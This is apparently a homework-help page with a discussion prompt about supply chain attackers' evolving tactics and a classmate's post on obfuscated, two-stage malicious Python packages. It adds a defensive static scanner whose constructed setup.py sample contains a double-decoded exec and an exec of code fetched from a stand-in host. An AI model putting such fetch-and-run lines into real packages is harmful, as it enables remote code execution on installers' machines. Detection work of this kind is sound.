Question
Over the last five years, industry has seen a rise in supply chain attacks, and in many cases these attacks have targeted the code base of the victim in order to infect the software supply chain of its downstream customers. The most notable of these attacks was the one perpetrated against SolarWinds back in 2020, which delivered malware to thousands of clients through a trojanized software update. In this discussion, you will dig into the findings of a blog published by Checkmarx, a leading vendor in application security, that highlights the recent evolution of these supply chain attackers.
Instructions
Read/review the below blog article from Checkmarx:
https://checkmarx.com/blog/evolution-of-a-software-supply-chain-attacker/
Using the discussion board, create an original post answering the following question:
How are supply chain attackers evolving their tactics, techniques and procedures (TTPs) as compared to previous years?
Respond to one of your classmates original posts with thoughts or feedback on their answers.
REMEMBER: Responses should be professional and add to the conversation. Responses like "I agree" or "I liked your post" won't be counted. Try to add something original to the conversation or ask questions about their opinions.
Need help with a response to this post from my classmate.
Ryan Patterson
Fri Jan 19 @ 12:18 pm CST
The evolution of supply chain attackers' tactics, techniques, and procedures (TTPs) has been adapted in recent years, as detailed in this article through threat actors like PYTA27. One of the major changes is the shift towards more advanced obfuscation and evasion methods. Unlike in the past, when attackers might have used easily detectable malicious code, modern attackers use complex obfuscation tools like Pyobfuscate and Hyperion to conceal their malicious intent. PYTA27 has demonstrated a progression from using plain-text code to using double obfuscation techniques. Attackers are also using legitimate-looking package names and descriptions to deceive users, increasing the chance of success in these attacks.
Another shift these attackers have employed is multi-stage attacks and targeting specific platforms or software ecosystems. PYTA27 has focused on Discord users, employing two-stage attack processes that involve downloading additional malicious code from a remote server. This signifies a departure from traditional one-off attacks. PYTA27 has shown increasing degrees of OPSEC by routinely changing their usernames and the package names of their malicious code. This underscores the need for security professionals to continuously update their defensive strategies, as discussed in last week's assignment with the application of the Business Security in Maturity Model (BSIMM).
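The two tells Ryan's post singles out, obfuscated code that is decoded (sometimes through more than one layer) and handed to exec, and a first stage that pulls a second stage from a remote server, are things a reviewer can look for statically before a package is installed. The scanner below is an added example written for this discussion; it is not code from the Checkmarx blog, from the classmate's post, or from any real malicious package. It parses a Python file with the standard `ast` module and flags: exec/eval fed directly by one or more decoder calls, exec/eval fed by a urllib or requests fetch, any such fetch at module top level (which in a setup.py runs at `pip install` time), and long string literals with high Shannon entropy. The decoder and fetcher name lists, the length and entropy thresholds, and the two sample files are all constructed assumptions for illustration, and the "payload" blob is a deterministic base64-alphabet string, not a real payload.

```python
"""Heuristic static scan of a Python package file for staged-payload indicators.

Added example, not from the Checkmarx post or any real malware sample. Name
lists and thresholds are assumptions to tune against a real package corpus.
"""
import ast
import math
import string
from dataclasses import dataclass

DYNAMIC_EXEC = {"exec", "eval"}
DECODERS = {"b64decode", "b32decode", "b85decode", "a85decode", "decompress", "unhexlify"}
URL_FETCHERS = {"urlopen", "urlretrieve"}
ENTROPY_MIN_LEN = 64      # only examine long literals (assumption)
ENTROPY_THRESHOLD = 4.5   # bits per character (assumption)


@dataclass
class Finding:
    line: int
    kind: str
    detail: str


def shannon_entropy(s: str) -> float:
    """Empirical Shannon entropy of a string, in bits per character."""
    if not s:
        return 0.0
    counts = {}
    for ch in s:
        counts[ch] = counts.get(ch, 0) + 1
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def _call_name(call: ast.Call):
    """Bare callee name: exec(...) -> 'exec', base64.b64decode(...) -> 'b64decode'."""
    f = call.func
    if isinstance(f, ast.Name):
        return f.id
    if isinstance(f, ast.Attribute):
        return f.attr
    return None


def _is_network_call(call: ast.Call) -> bool:
    """urllib-style fetchers by name, plus requests.get/post by receiver."""
    if _call_name(call) in URL_FETCHERS:
        return True
    f = call.func
    return (isinstance(f, ast.Attribute) and isinstance(f.value, ast.Name)
            and f.value.id == "requests" and f.attr in {"get", "post"})


def _decoder_depth(call: ast.Call) -> int:
    """Count decoder calls chained into the first argument (or method receiver).
    exec(zlib.decompress(base64.b64decode(p))) -> 2 (the 'double obfuscation' case)."""
    depth, cur = 0, call
    while isinstance(cur, ast.Call):
        if _call_name(cur) in DECODERS:
            depth += 1
        if cur.args:
            cur = cur.args[0]
        elif isinstance(cur.func, ast.Attribute):
            cur = cur.func.value          # e.g. b64decode(x).decode()
        else:
            break
    return depth


def scan_source(src: str, filename: str = "<package>"):
    """Return Findings for one Python source file. No data-flow analysis: only
    decoders/fetches written directly inside the exec/eval call are attributed to it."""
    findings = []
    for node in ast.walk(ast.parse(src, filename=filename)):
        if isinstance(node, ast.Call):
            name = _call_name(node)
            if name in DYNAMIC_EXEC:
                if any(isinstance(n, ast.Call) and _is_network_call(n) for n in ast.walk(node)):
                    kind, detail = "fetch-then-exec", f"{name}() over a remote response (second stage)"
                else:
                    depth = _decoder_depth(node)
                    kind = {0: "dynamic-exec", 1: "decode-then-exec"}.get(depth, "double-decoded-exec")
                    detail = f"{name}() behind {depth} decoder layer(s)"
                findings.append(Finding(node.lineno, kind, detail))
            elif _is_network_call(node):
                findings.append(Finding(node.lineno, "network-fetch", f"{name}() runs at import/install time"))
        elif isinstance(node, ast.Constant) and isinstance(node.value, str) and len(node.value) >= ENTROPY_MIN_LEN:
            h = shannon_entropy(node.value)
            if h >= ENTROPY_THRESHOLD:
                findings.append(Finding(node.lineno, "high-entropy-string", f"{len(node.value)} chars, {h:.2f} bits/char"))
    return findings


# Constructed samples: a benign setup.py and one mimicking the staged, double-decoded
# pattern. _BLOB is a deterministic base64-alphabet string (each symbol exactly twice),
# not a real payload, so nothing here executes anything.
_ALPHABET = string.ascii_letters + string.digits + "+/"
_BLOB = "".join(_ALPHABET[(i * 5) % 64] for i in range(128))

SAMPLE_CLEAN = """\
from setuptools import setup
setup(name="example-pkg", version="1.0")
"""

SAMPLE_STAGED = f"""\
import base64, zlib, urllib.request
from setuptools import setup
_p = "{_BLOB}"
exec(zlib.decompress(base64.b64decode(_p)))
exec(urllib.request.urlopen("http://example.invalid/stage2").read())
setup(name="discord-helper", version="0.1")
"""

if __name__ == "__main__":
    for f in scan_source(SAMPLE_STAGED, "setup.py"):
        print(f"setup.py:{f.line}: {f.kind}: {f.detail}")
```

The staged sample yields four findings (a double-decoded exec on line 4, a fetch-then-exec plus the bare network fetch on line 5, and the high-entropy literal on line 3) while the clean sample yields none. The obvious evasion is to assign the decoded bytes to a variable first, or to import the decoder under an alias, which this chain-following heuristic does not track; that is exactly why the post's point about continuously updating defences applies to the scanner as much as to the attacker.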
Step by Step Solution
Step: 1
Great analysis Ryan I completely agree with your points about the evolving tactics of supply chain a...